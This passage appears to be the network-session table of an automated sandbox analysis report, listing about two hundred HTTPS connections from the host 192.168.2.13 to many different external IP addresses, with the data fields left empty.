                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13894192.168.2.135744079.53.45.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13895192.168.2.134304432.110.173.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13896192.168.2.1359936145.190.216.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13897192.168.2.135113662.191.6.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13898192.168.2.134751648.87.113.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13899192.168.2.134563895.82.253.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13900192.168.2.1351364178.95.197.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13901192.168.2.1358442181.54.185.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13902192.168.2.1338170171.181.41.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13903192.168.2.133833673.238.210.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13904192.168.2.134015643.91.187.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13905192.168.2.135886068.195.17.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13906192.168.2.1344866120.179.120.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13907192.168.2.135694217.210.120.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13908192.168.2.135204223.192.103.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13909192.168.2.1356084115.171.208.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13910192.168.2.133317069.160.25.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13911192.168.2.1358626190.51.90.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13912192.168.2.1336750194.159.255.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13913192.168.2.134205844.169.54.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13914192.168.2.1355132128.58.68.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13915192.168.2.1348888152.216.213.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13916192.168.2.134934624.123.107.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13917192.168.2.1359146100.173.15.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13918192.168.2.133637893.61.115.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13919192.168.2.1359354115.4.139.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13920192.168.2.1334666198.188.187.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13921192.168.2.1345404180.98.180.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13922192.168.2.134872635.102.13.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13923192.168.2.134371431.121.107.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13924192.168.2.1354576139.102.220.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13925192.168.2.1353724172.187.65.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13926192.168.2.1359790160.232.214.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13927192.168.2.1342616174.241.150.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13928192.168.2.1349756124.111.13.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13929192.168.2.134388823.21.2.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13930192.168.2.135478293.125.183.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13931192.168.2.1347982169.89.85.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13932192.168.2.1351266192.177.237.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13933192.168.2.1342564159.212.144.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13934192.168.2.134822436.59.239.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13935192.168.2.1350296204.122.49.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13936192.168.2.1334214159.210.46.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13937192.168.2.135988498.236.117.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13938192.168.2.1351054116.8.91.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13939192.168.2.1345902119.60.220.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13940192.168.2.1351402121.109.133.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13941192.168.2.1342436139.159.197.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13942192.168.2.134138084.66.170.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13943192.168.2.134160854.46.132.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13944192.168.2.134612044.242.244.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13945192.168.2.134061214.23.170.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13946192.168.2.1360864102.230.105.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13947192.168.2.1334210194.104.233.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13948192.168.2.135947844.143.138.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13949192.168.2.135502664.41.129.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13950192.168.2.135448865.243.113.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13951192.168.2.135040434.179.0.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13952192.168.2.134528847.59.45.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13953192.168.2.1344748143.109.94.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13954192.168.2.1334538189.210.154.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13955192.168.2.1340464169.146.52.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13956192.168.2.1352386221.136.246.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13957192.168.2.1349588135.197.78.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13958192.168.2.13514468.127.73.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13959192.168.2.1343876132.196.183.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13960192.168.2.1340466195.169.111.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13961192.168.2.1338422153.131.115.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13962192.168.2.134487068.235.97.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13963192.168.2.1344468208.171.173.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13964192.168.2.1341660222.35.107.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13965192.168.2.1353726180.222.18.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13966192.168.2.1343754200.30.10.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13967192.168.2.1354510128.58.246.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13968192.168.2.1345184211.230.97.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13969192.168.2.13442108.166.199.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13970192.168.2.1353060140.72.216.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13971192.168.2.1341140207.30.209.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13972192.168.2.134189448.89.93.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13973192.168.2.133301613.239.235.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13974192.168.2.1332986168.216.47.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13975192.168.2.1339008141.127.120.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13976192.168.2.1350524134.144.162.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13977192.168.2.134276470.13.77.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13978192.168.2.133551498.47.113.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13979192.168.2.1343562114.143.197.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13980192.168.2.1352920194.225.220.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13981192.168.2.136024659.222.81.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13982192.168.2.134358479.33.161.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13983192.168.2.1348022195.114.151.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13984192.168.2.1345914161.33.118.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13985192.168.2.1356552107.188.169.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13986192.168.2.1335294150.168.252.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13987192.168.2.1353960173.159.25.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13988192.168.2.1356484185.93.35.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13989192.168.2.13586404.82.24.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13990192.168.2.135304249.102.147.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13991192.168.2.1353664154.230.52.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13992192.168.2.1354000208.242.195.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13993192.168.2.1356592222.118.1.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13994192.168.2.1354422130.52.221.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13995192.168.2.1340062114.3.0.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13996192.168.2.135896493.170.208.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13997192.168.2.133599413.55.184.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13998192.168.2.1350768113.113.208.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13999192.168.2.133553423.109.134.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14000192.168.2.1338868191.93.236.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14001192.168.2.133464062.153.164.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14002192.168.2.134414846.65.67.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14003192.168.2.135452454.85.243.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14004192.168.2.135554442.0.200.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14005192.168.2.134704872.202.4.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14006192.168.2.1338518160.53.57.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14007192.168.2.1332846193.213.235.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14008192.168.2.1346412148.238.227.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14009192.168.2.133706631.132.204.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14010192.168.2.134772038.193.191.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14011192.168.2.134706496.109.145.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14012192.168.2.1360658192.204.13.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14013192.168.2.1336764142.87.203.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14014192.168.2.135173036.64.61.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14015192.168.2.133340252.15.216.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14016192.168.2.1346380207.114.60.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14017192.168.2.1339062201.108.139.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14018192.168.2.1360492204.168.218.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14019192.168.2.135501281.98.55.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14020192.168.2.1353064126.203.124.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14021192.168.2.1337458107.215.247.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14022192.168.2.1338428114.152.10.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14023192.168.2.1346084151.209.24.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14024192.168.2.1337950188.156.199.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14025192.168.2.1346482222.47.116.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14026192.168.2.135240412.106.87.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14027192.168.2.1356356118.254.3.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14028192.168.2.1336854143.235.245.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14029192.168.2.134990683.106.124.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14030192.168.2.1341228181.28.134.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14031192.168.2.135007645.22.163.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14032192.168.2.133784631.181.213.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14033192.168.2.135995645.193.11.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14034192.168.2.1347528129.239.49.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14035192.168.2.1341424130.11.57.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14036192.168.2.1358876147.245.242.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14037192.168.2.135393286.133.178.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14038192.168.2.1340588196.217.5.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14039192.168.2.134492490.53.31.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14040192.168.2.133732086.58.150.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14041192.168.2.1340448200.65.184.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14042192.168.2.1358688145.200.27.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14043192.168.2.1346372115.213.232.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14044192.168.2.135761044.104.105.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14045192.168.2.134792013.138.218.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14046192.168.2.134415460.105.61.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14047192.168.2.1351332168.19.38.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14048192.168.2.1344204212.210.110.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14049192.168.2.1343572125.174.118.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14050192.168.2.1340462102.196.131.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14051192.168.2.1332792105.75.20.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14052192.168.2.1340708198.75.169.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14053192.168.2.133792685.162.40.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14054192.168.2.1343160200.204.224.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14055192.168.2.136052282.54.52.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14056192.168.2.134660838.161.172.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14057192.168.2.1356180102.254.109.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14058192.168.2.1340694120.220.147.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14059192.168.2.1353396113.250.36.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14060192.168.2.1357788123.149.84.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14061192.168.2.133883273.138.206.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14062192.168.2.1350122160.141.125.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14063192.168.2.1348820101.69.204.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14064192.168.2.1354406189.201.166.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14065192.168.2.1360182114.238.156.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14066192.168.2.1355856155.230.88.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14067192.168.2.133560669.212.173.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14068192.168.2.134969069.59.82.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14069192.168.2.1341534213.14.194.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14070192.168.2.1353786204.163.191.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14071192.168.2.1333814134.211.132.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14072192.168.2.135091671.228.31.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14073192.168.2.1341316110.252.114.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14074192.168.2.1335156212.137.115.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14075192.168.2.1346396209.32.198.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14076192.168.2.1343166120.60.197.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14077192.168.2.135940487.84.199.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14078192.168.2.1343908187.58.9.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14079192.168.2.135347217.212.43.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14080192.168.2.1358930116.97.189.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14081192.168.2.1345002126.11.100.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14082192.168.2.1354896217.175.140.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14083192.168.2.133592294.164.201.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14084192.168.2.1338886210.61.239.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14085192.168.2.1344420175.231.109.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14086192.168.2.1348374187.97.114.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14087192.168.2.1341482198.194.18.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14088192.168.2.1351828184.131.3.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14089192.168.2.1337730119.5.56.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14090192.168.2.1339942219.60.139.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14091192.168.2.133660652.221.244.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14092192.168.2.134135849.41.162.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14093192.168.2.135488899.218.30.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14094192.168.2.134870812.7.90.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14095192.168.2.1343792222.19.193.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14096192.168.2.1333208165.157.34.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14097192.168.2.1335328133.143.67.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14098192.168.2.1354800112.131.237.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14099192.168.2.1346726197.199.97.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14100192.168.2.1333712202.234.67.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14101192.168.2.133999227.40.71.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14102192.168.2.134240081.35.138.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14103192.168.2.1341424218.147.107.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14104192.168.2.134816886.59.55.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14105192.168.2.133366844.8.227.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
